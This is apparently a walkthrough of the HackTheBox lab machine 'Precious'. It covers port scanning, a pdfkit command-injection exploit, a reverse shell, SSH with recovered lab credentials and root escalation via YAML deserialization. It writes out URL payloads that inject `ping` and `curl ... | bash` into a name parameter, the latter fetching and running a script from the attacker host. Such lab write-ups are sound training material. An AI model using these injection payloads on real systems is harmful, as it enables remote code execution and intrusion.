Precious
#Linux #Enumeration #Command-Injection
Precious is an easy-rated Linux machine from HackTheBox created by Nauten. This machine is straightforward and does not have any rabbit hole or hard-to-find information, but still, you need to do good research because the exploit is a little uncommon. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.49.93
Gather Information
This step is always the same, you have to ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.
ping -c 1 10.129.49.93
At this point, we know that is only a website, but we still need more details before trying anything.
Add that domain to your file /etc/hosts
Browser: http://10.129.49.93
There is nothing special about this site, one of the best options, before interacting with the “Web Page to PDF” is using wfuzz
Spoiler, no results.
Browser: Submit http://precious.htb
Ok, nothing happens with the own URL, let’s open a simple http.server using python to see how the site react to it, the result does not change if you use the command without an index.html file.
BrowserSubmit: http://10.10.14.76:80/
The output is a simple pdf file, nothing suspicious and with using only the textbox there is no way to get a response from bash commands, let’s check the metadata.
Weaponization and Exploitation
If you search for “pdfkit v0.8.6 exploit” you will find a critical command injection exploit. We will use that to get access to the machine. (https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795)
As we can see, we only have to change the content from params[:name] from the url to execute a command, to test if this definitely works, you have to open a local terminal and write tcpdump -i eth0 icmp (To check your interface, use ifconfig) and submit at the browser http://10.10.14.76:80/?name=#{‘%20`ping -c 1 10.10.14.76 | bash`’}.
After the test, now we know that is working and we can create a reverse shell, for this, we need two local terminals and one index.html file with a bash command inside.
BrowserSubmit: http://10.10.14.76:80/?name=#{‘%20`curl 10.10.14.76 | bash`’}
You can close your LocalTerm1 and the LocalTerm2 now is the target command prompt called “Target”. After this, a good practice is to make a bash treatment.
Looks like only Henry can open the user flag, we need to gain his privileges, and for that we need to find any important file that could contain his credentials, like configs.
So, our best option at this moment, is to return to home and check if our account, user ruby, has something in the personal folder. At first glance it shows that there is nothing there, but if you show hidden files you can see more stuff.
But there are many folders…
Our best option now, is to open a new LocalTerm and try to login using ssh with these credentials {henry@Q3c1AqGHtoI0aXAYFH}
We are in, now your LocalTerm is Henry, let’s go to his folder and open the file user.txt
Privileges Scalation
Now we need to get the credentials of root.
Looks like as Henry, we can execute that “rb” file as the user Root without password
At first glance, we can see that read a file called “dependencies.yml”, we can use that for us.
Nothing important in the content, but there is an exploit called Yaml Deserialization (It took me a lot of time to find it), that can be used here, by creating a new dependencies.yml file with this code, remember to create the new dependencies.yml at Henry’s folder because there you have writing permission.
Now we have to make a modification at the dependencies.yml file and then run again the previous command.
After executing again the command, we change from Henry to Root, now we have the permission to read the /root/ folder
Last updated